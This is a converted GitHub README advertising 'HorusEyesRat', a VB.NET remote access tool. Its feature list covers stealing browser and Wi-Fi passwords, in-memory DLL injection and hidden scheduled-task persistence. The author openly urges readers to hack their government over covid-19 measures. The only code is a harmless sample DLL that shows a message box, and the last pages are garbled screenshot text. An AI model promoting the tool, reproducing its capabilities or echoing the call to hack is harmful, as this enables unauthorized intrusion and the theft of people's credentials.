1/6

arsium

HorusEyesRat | OUTDATED | New remote acces tool
available written in C# here :
https://github.com/arsium/EagleMonitorRAT !

github.com/arsium/HorusEyesRat_Public

Remote Access Tool Written in VB.NET 
 In the current circumstances , I authorize you to hack your government against the

measurements they took for the "covid-19". The deprivation of the liberty has to be punished.
Server : .NET 4.8 

 Client : .NET 4.5

Features :

Supports DNS (No-IP for example)
Multi-Threaded
Asynchronous
Packets Serialization
Multi Ports Listener
Automation Tasks when client is connected
Save Settings for automation tasks
Blur ScreenLocker
Monitor Rotation (0 , 90 , 180 , 270 degrees)
Hide & Show Taskbar
Hide & Show Desktop Icons

https://github.com/arsium/HorusEyesRat_Public


2/6

Hide & Show Cursor
Swap & Normal State Mouse Buttons
Lock & Unlock Keyboard
Empty Bin
Native Injection : You can inject an unmanaged DLL (C++ , C , D...)
32 & 64 bits stubs
Mass Tasks: Passwords Recovery , History Recovery , Wifi Passwords Recovery
Tasks Manager : Kill , Resume , Pause
Passwords Recovery (+35 web browsers based on chromium)
History Recovery (+35 web browsers based on chromium)
Wifi Passwords Recovery
Power : Log out , Reboot , Shutdown , Hibernate , Suspend
BSOD
Increase Volume
Decrease Volume
Mute | Unmute Volume
Save all passwords | history recovered
Export History | Passwords as .csv file
Installation : Set a task in TaskScheduler | Hidden from startup + copy file in local user
path hidden
Ability to change your client priority
Ability to ask for privileges
Check UAC at different levels (if enable or not)
File Manager : Create Directory, Open File, Delete File, Move File To Bin, Download
File

Sources :

System.Data.SQLite.dll : https://github.com/Faithlife/System.Data.SQLite
IpAPI : https://ip-api.com/
Passwords Recovery : Modded Library Based on : https://github.com/0xfd3/Chrome-
Password-Recovery
Wifi Passwords Recovery : Modded Library Based on :
https://github.com/r3nhat/SharpWifiGrabber
Loading Unmanaged DLLs in Managed EXE : Class comes from :
https://github.com/schellingb/DLLFromMemory-net with manual mapping for those dlls.
Code I used to test the loading of dll in memory (in C++ but also worked in D Lang) :

https://github.com/Faithlife/System.Data.SQLite
https://ip-api.com/
https://github.com/0xfd3/Chrome-Password-Recovery
https://github.com/r3nhat/SharpWifiGrabber
https://github.com/schellingb/DLLFromMemory-net


3/6

Note for injection:

32 bit dlls (in c++ or whatever you want) is for 32 bit stub
64 bit dlls (in c++ or whatever you want) is for 64 bit stub
Don't inject a 32 bit dll in 64 bit stub and vice-versa (you can try if you want but the
server will give you an error :))
To use File Manager, make Refresh => All

Preview :

BOOL APIENTRY DllMain( HMODULE hModule, 
                      DWORD  ul_reason_for_call, 
                      LPVOID lpReserved 
                    ) 
{ 
   switch (ul_reason_for_call) 
   { 
   case DLL_PROCESS_ATTACH: 
       MessageBoxA(NULL, "Hello World!", "Dll says:", MB_OK); 
   case DLL_THREAD_ATTACH: 
   case DLL_THREAD_DETACH: 
   case DLL_PROCESS_DETACH: 
       break; 
   } 
   return TRUE; 
} 



4/6

https://camo.githubusercontent.com/d653c5bb158ea3d58956df59ce4595d572865ef3624a9a143d07ced1df615ba1/68747470733a2f2f692e706f7374696d672e63632f744a42376e5030722f436170747572652d642d6372616e2d3536392e706e67
https://camo.githubusercontent.com/1582a4b5fe295d330b14fbbddaa2f7bf0876e29a0057743680d3d7d3d7683120/68747470733a2f2f692e706f7374696d672e63632f4e47444b6e6879312f436170747572652d642d6372616e2d3537302e706e67
https://camo.githubusercontent.com/c5d5814b8a8324829a1d20e4b25d59afbf02fb1b49b9e5313ee9c2d7bafd119d/68747470733a2f2f692e706f7374696d672e63632f33773252437a35302f436170747572652d642d6372616e2d3537312e706e67




5/6

https://camo.githubusercontent.com/c0395b4dd4a9394fefbb58209b9deb36a695ed7f6a236ea7964705648f84b6f6/68747470733a2f2f692e706f7374696d672e63632f765a4a546e626a642f436170747572652d642d6372616e2d3537322e706e67
https://camo.githubusercontent.com/c081f6ae288fdc520d1a2430fd8e110e9e360f829c13776693cff06eab7705c5/68747470733a2f2f692e706f7374696d672e63632f464864313137545a2f436170747572652d642d6372616e2d3537332e706e67
https://camo.githubusercontent.com/6738a6530badffe02a8779e9e528b960f4c0ce02999cc7d0a958f1d368fae4e5/68747470733a2f2f692e706f7374696d672e63632f5459487052724a312f436170747572652d642d6372616e2d3537342e706e67
mm oh =

——
= bons Eyes Rat V

mee F

32bit MM 64 bit

BB instal

Scheduled Task Time:





6/6

https://camo.githubusercontent.com/f4149169a1b3fdcd8eb869e6303b8e512864db868fc38003fa3c32c90ea5aeeb/68747470733a2f2f692e706f7374696d672e63632f52563057355066322f436170747572652d642d6372616e2d3537352e706e67
“Ze FBBegso e@B-@e06d

IP Usemame Version Computer Region Process Handle Privilege 32/64 Bits Port

= ae

6/6